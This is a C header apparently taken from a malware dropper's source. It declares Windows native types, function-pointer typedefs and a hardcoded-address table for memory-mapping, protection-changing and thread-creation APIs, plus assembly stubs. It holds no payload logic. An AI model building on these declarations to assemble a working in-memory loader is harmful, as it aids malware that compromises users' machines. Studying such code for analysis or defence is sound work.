dropper_AssemblyBlock2.h

1. #ifndef __ASSEMBLY_BLOCK2_H__
2. #define __ASSEMBLY_BLOCK2_H__
3.  
4. #include "StdAfx.h"
5.  
6. typedef struct _UNICODE_STRING {
7.         USHORT Length;
8.         USHORT MaximumLength;
9.         PWSTR  Buffer;
10. } UNICODE_STRING, *PUNICODE_STRING;
11.  
12. typedef struct _OBJECT_ATTRIBUTES {
13.         ULONG Length;
14.         HANDLE RootDirectory;
15.         UNICODE_STRING *ObjectName;
16.         ULONG Attributes;
17.         PVOID SecurityDescriptor;
18.         PVOID SecurityQualityOfService;
19. } OBJECT_ATTRIBUTES;
20.  
21. #define POBJECT_ATTRIBUTES OBJECT_ATTRIBUTES*
22.  
23. typedef enum _SECTION_INHERIT
24. {
25.     ViewShare = 1,
26.     ViewUnmap = 2
27. } SECTION_INHERIT;
28.  
29. typedef int      (WINAPI *_tlstrcmpiW)(LPCWSTR, LPCWSTR);
30. typedef SIZE_T   (WINAPI *_tVirtualQuery)(LPCVOID, PMEMORY_BASIC_INFORMATION, SIZE_T);
31. typedef BOOL     (WINAPI *_tVirtualProtect)(LPVOID, SIZE_T, DWORD, PDWORD);
32. typedef FARPROC  (WINAPI *_tGetProcAddress)(HMODULE, LPCSTR);
33. typedef LPVOID   (WINAPI *_tMapViewOfFile)(HANDLE, DWORD, DWORD, DWORD, SIZE_T);
34. typedef BOOL     (WINAPI *_tUnmapViewOfFile)(LPCVOID);
35. typedef BOOL     (WINAPI *_tFlushInstructionCache)(HANDLE, LPCVOID, SIZE_T);
36. typedef HMODULE  (WINAPI *_tLoadLibraryW)(LPCWSTR);
37. typedef BOOL     (WINAPI *_tFreeLibrary)(HMODULE);
38. typedef NTSTATUS (WINAPI *_tZwCreateSection)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, PLARGE_INTEGER, ULONG, ULONG, HANDLE);
39. typedef NTSTATUS (WINAPI *_tZwMapViewOfSection)(HANDLE, HANDLE, PVOID *, ULONG_PTR, SIZE_T, PLARGE_INTEGER, PSIZE_T, SECTION_INHERIT, ULONG, ULONG);
40. typedef HANDLE   (WINAPI *_tCreateThread)(LPSECURITY_ATTRIBUTES, SIZE_T, LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD);
41. typedef DWORD    (WINAPI *_tWaitForSingleObject)(HANDLE, DWORD);
42. typedef BOOL     (WINAPI *_tGetExitCodeThread)(HANDLE, LPDWORD);
43. typedef NTSTATUS (WINAPI *_tZwClose)(HANDLE);
44.  
45. typedef struct _HARDCODED_ADDRESSES {
46.     const HMODULE NTDLL_DLL;
47.     const HMODULE EMPTY_PTR;
48.  
49.     const _tlstrcmpiW             lstrcmpiW;
50.     const _tVirtualQuery          VirtualQuery;
51.     const _tVirtualProtect        VirtualProtect;
52.     const _tGetProcAddress        GetProcAddress;
53.     const _tMapViewOfFile         MapViewOfFile;
54.     const _tUnmapViewOfFile       UnmapViewOfFile;
55.     const _tFlushInstructionCache FlushInstructionCache;
56.     const _tLoadLibraryW          LoadLibraryW;
57.     const _tFreeLibrary           FreeLibrary;
58.     const _tZwCreateSection       ZwCreateSection;
59.     const _tZwMapViewOfSection    ZwMapViewOfSection;
60.     const _tCreateThread          CreateThread;
61.     const _tWaitForSingleObject   WaitForSingleObject;
62.     const _tGetExitCodeThread     GetExitCodeThread;
63.     const _tZwClose               ZwClose;
64. } HARDCODED_ADDRESSES, *PHARDCODED_ADDRESSES;
65.  
66. HARDCODED_ADDRESSES g_hardAddrs;
67.  
68. void __ASM_REF_3(void);
69. void __ASM_REF_4(void);
70. void __ASM_REF_5(void);
71. void __ASM_REF_6(void);
72. void __ASM_REF_7(void);
73.  
74. #endif